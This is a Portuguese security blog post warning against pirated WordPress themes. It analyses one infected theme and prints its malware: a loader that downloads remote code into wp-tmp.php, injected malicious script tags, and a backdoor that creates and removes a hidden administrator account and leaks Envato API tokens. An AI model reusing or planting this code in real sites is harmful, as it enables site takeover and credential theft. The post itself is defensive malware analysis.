Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:

./wp-content/themes/twentynineteen/functions.php
./wp-content/themes/twentyseventeen/functions.php
./wp-content/themes/twentysixteen/functions.php
./wp-includes/post.php
./wp-includes/wp-tmp.php
./wp-includes/wp-vcd.php

Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:

elseif ($tmpcontent = @file_get_contents(“http://www. harors .pw/code .php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);

verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:

<script type=”text/javascript” src=”//deloplen .com/ apu.php?zoneid=2542869″ async data-cfasync=”false”></script>
<script src=”//pushqwer .com/ ntfc.php?p=2542872″ data-cfasync=”false” async></script>

Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso “O site a seguir contém conteúdo malicioso ou enganoso”.

Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.

Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:

require $_SERVER[‘DOCUMENT_ROOT’].’/wp-load.php’;
$table_name = $wpdb->get_blog_prefix();
$sample = ‘a:1:{s:13:”administrator”;b:1;}’;
if( isset($_GET[‘ok’]) ) { echo ‘<!– Silence is golden. –>’;}
if( isset($_GET[‘awu’]) ) {
$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100010010’, ‘100010010’, ‘\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.’, ‘100010010’, ‘te@ea.st’, ”, ‘2011-06-07 00:00:00’, ”, ‘0’, ‘100010010’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, ‘100010010’, ‘{$table_name}capabilities’, ‘{$sample}’);”);
$wpdb->query(“INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, ‘100010010’, ‘{$table_name}user_level’, ’10’);”); }
if( isset($_GET[‘dwu’]) ) { $wpdb->query(“DELETE FROM $wpdb->users WHERE `ID` = 100010010”);
$wpdb->query(“DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010”);}
if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘<center><h2>’ . esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])) . ‘<br>’;
echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘</center></h2>’; }

Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):

| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |

Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.

Conclusão:

Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.

Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.

O post Por que não utilizar temas e plugins piratas. apareceu primeiro em ETH SECURITY.